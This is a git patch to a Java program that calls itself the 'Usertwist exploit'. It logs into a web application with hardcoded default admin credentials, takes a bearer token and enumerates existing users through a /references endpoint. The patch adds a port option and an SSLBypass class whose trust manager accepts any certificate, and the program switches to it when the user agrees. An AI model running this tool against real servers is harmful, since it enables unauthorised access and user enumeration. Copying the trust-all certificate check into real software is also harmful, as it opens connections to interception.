From fb4c53fe362fa2ce663552650777c319f925f8f0 Mon Sep 17 00:00:00 2001
From: Mateo <mdm@athelas.fr>
Date: Thu, 1 Aug 2024 15:51:18 +0200
Subject: [PATCH] Added SSL verification bypass & port choice

---
 .idea/inspectionProfiles/Project_Default.xml  |  2 +-
 src/fr/motysten/usertwist/exploit/Main.java   | 58 ++++++++++++++++---
 .../usertwist/exploit/tools/SSLBypass.java    | 43 ++++++++++++++
 3 files changed, 95 insertions(+), 8 deletions(-)
 create mode 100644 src/fr/motysten/usertwist/exploit/tools/SSLBypass.java

diff --git a/.idea/inspectionProfiles/Project_Default.xml b/.idea/inspectionProfiles/Project_Default.xml
index 869c305..ec2d9bf 100644
--- a/.idea/inspectionProfiles/Project_Default.xml
+++ b/.idea/inspectionProfiles/Project_Default.xml
@@ -2,7 +2,7 @@
   <profile version="1.0">
     <option name="myName" value="Project Default" />
     <inspection_tool class="AutoCloseableResource" enabled="true" level="WARNING" enabled_by_default="true">
-      <option name="METHOD_MATCHER_CONFIG" value="java.util.Formatter,format,java.io.Writer,append,com.google.common.base.Preconditions,checkNotNull,org.hibernate.Session,close,java.io.PrintWriter,printf,java.io.PrintStream,printf,java.net.http.HttpClient,newHttpClient" />
+      <option name="METHOD_MATCHER_CONFIG" value="java.util.Formatter,format,java.io.Writer,append,com.google.common.base.Preconditions,checkNotNull,org.hibernate.Session,close,java.io.PrintWriter,printf,java.io.PrintStream,printf,java.net.http.HttpClient,newHttpClient,java.net.http.HttpClient.Builder,build" />
     </inspection_tool>
   </profile>
 </component>
\ No newline at end of file
diff --git a/src/fr/motysten/usertwist/exploit/Main.java b/src/fr/motysten/usertwist/exploit/Main.java
index fa5c910..7efd3b3 100644
--- a/src/fr/motysten/usertwist/exploit/Main.java
+++ b/src/fr/motysten/usertwist/exploit/Main.java
@@ -1,9 +1,14 @@
 package fr.motysten.usertwist.exploit;
 
 import fr.motysten.usertwist.exploit.tools.Cesar;
+import fr.motysten.usertwist.exploit.tools.SSLBypass;
 import org.json.JSONArray;
 import org.json.JSONObject;
 
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLException;
+import javax.net.ssl.SSLHandshakeException;
+import javax.net.ssl.TrustManager;
 import java.io.BufferedReader;
 import java.io.IOException;
 import java.io.InputStreamReader;
@@ -11,16 +16,23 @@ import java.net.URI;
 import java.net.http.HttpClient;
 import java.net.http.HttpRequest;
 import java.net.http.HttpResponse;
+import java.security.KeyManagementException;
+import java.security.NoSuchAlgorithmException;
+import java.security.SecureRandom;
 
 public class Main {
 
     public static String link = "https://poc.athelas.fr";
     public static String username = "admin";
     public static String password = "AdminSecret1C";
+    public static String port = "443";
 
-    public static void main(String[] args) throws IOException, InterruptedException {
+    public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
         BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
 
+        SSLContext customContext = SSLContext.getInstance("TLS");
+        customContext.init(null, new TrustManager[]{new SSLBypass()}, new SecureRandom());
+
         System.out.println("Usertwist exploit by Motysten");
         System.out.println("Please don't use for unethical purpose !\n");
         String readLine;
@@ -29,6 +41,10 @@ public class Main {
         readLine = reader.readLine();
         if (!readLine.isEmpty()) {link = readLine;}
 
+        System.out.println("Please enter the port of the remote web server (leave empty to use default) :");
+        readLine = reader.readLine();
+        if (!readLine.isEmpty()) {port = readLine;}
+
         System.out.println("Please enter the used username (leave empty to use default) :");
         readLine = reader.readLine();
         if (!readLine.isEmpty()) {username = readLine;}
@@ -45,14 +61,42 @@ public class Main {
 
         System.out.println("Gathering Bearer token...");
 
-        HttpRequest request = HttpRequest.newBuilder(URI.create(link + "/login"))
-                .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
-                .build();
+        HttpResponse<String> response = null;
+        HttpRequest request;
 
-        HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
+        boolean tokenFound = false;
+        while (!tokenFound) {
+            try {
+                request = HttpRequest.newBuilder(URI.create(link + ":" + port + "/login"))
+                        .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
+                        .build();
+
+                response = client.send(request, HttpResponse.BodyHandlers.ofString());
+                tokenFound = true;
+            } catch (SSLHandshakeException e) {
+                System.err.println("Remote server certificate issuer couldn't be verified. Someone could be spying on your network.");
+                System.err.println("Would you like to continue anyway ? [y/N]");
+                if (!reader.readLine().equalsIgnoreCase("y")) {
+                    System.err.println("Operation aborted ! Security failure.");
+                    System.exit(1);
+                } else {
+                    client = HttpClient.newBuilder().sslContext(customContext).build();
+                }
+            } catch (SSLException e) {
+                if (e.getMessage().contains("plaintext connection?")) {
+                    System.err.println("Looks like you're trying to send an HTTPS request on HTTP port. Would you like to switch on port 443 ? [Y/n]");
+                    if (reader.readLine().equalsIgnoreCase("n")) {
+                        System.err.println("Operation aborted !");
+                        System.exit(1);
+                    } else {
+                        port = "443";
+                    }
+                }
+            }
+        }
 
         if (response.statusCode() == 401) {
-            System.err.println("Invalid credentials ! Pleas try again (defaults credentials could help)");
+            System.err.println("Invalid credentials ! Please try again (defaults credentials could help)");
             System.exit(1);
         }
 
@@ -67,7 +111,7 @@ public class Main {
 
         System.out.println("\nScanning for existing users...");
 
-        request = HttpRequest.newBuilder(URI.create(link + "/references"))
+        request = HttpRequest.newBuilder(URI.create(link + ":" + port + "/references"))
                 .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
                 .setHeader("Authorization", "Bearer " + token)
                 .build();
diff --git a/src/fr/motysten/usertwist/exploit/tools/SSLBypass.java b/src/fr/motysten/usertwist/exploit/tools/SSLBypass.java
new file mode 100644
index 0000000..94fb2c9
--- /dev/null
+++ b/src/fr/motysten/usertwist/exploit/tools/SSLBypass.java
@@ -0,0 +1,43 @@
+package fr.motysten.usertwist.exploit.tools;
+
+import javax.net.ssl.SSLEngine;
+import javax.net.ssl.X509ExtendedTrustManager;
+import java.net.Socket;
+import java.security.cert.X509Certificate;
+
+public class SSLBypass extends X509ExtendedTrustManager {
+    @Override
+    public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+
+    }
+
+    @Override
+    public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+
+    }
+
+    @Override
+    public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+    }
+
+    @Override
+    public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+    }
+
+    @Override
+    public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
+
+    }
+
+    @Override
+    public void checkServerTrusted(X509Certificate[] x509Certificates, String s)  {
+
+    }
+
+    @Override
+    public X509Certificate[] getAcceptedIssuers() {
+        return new X509Certificate[0];
+    }
+}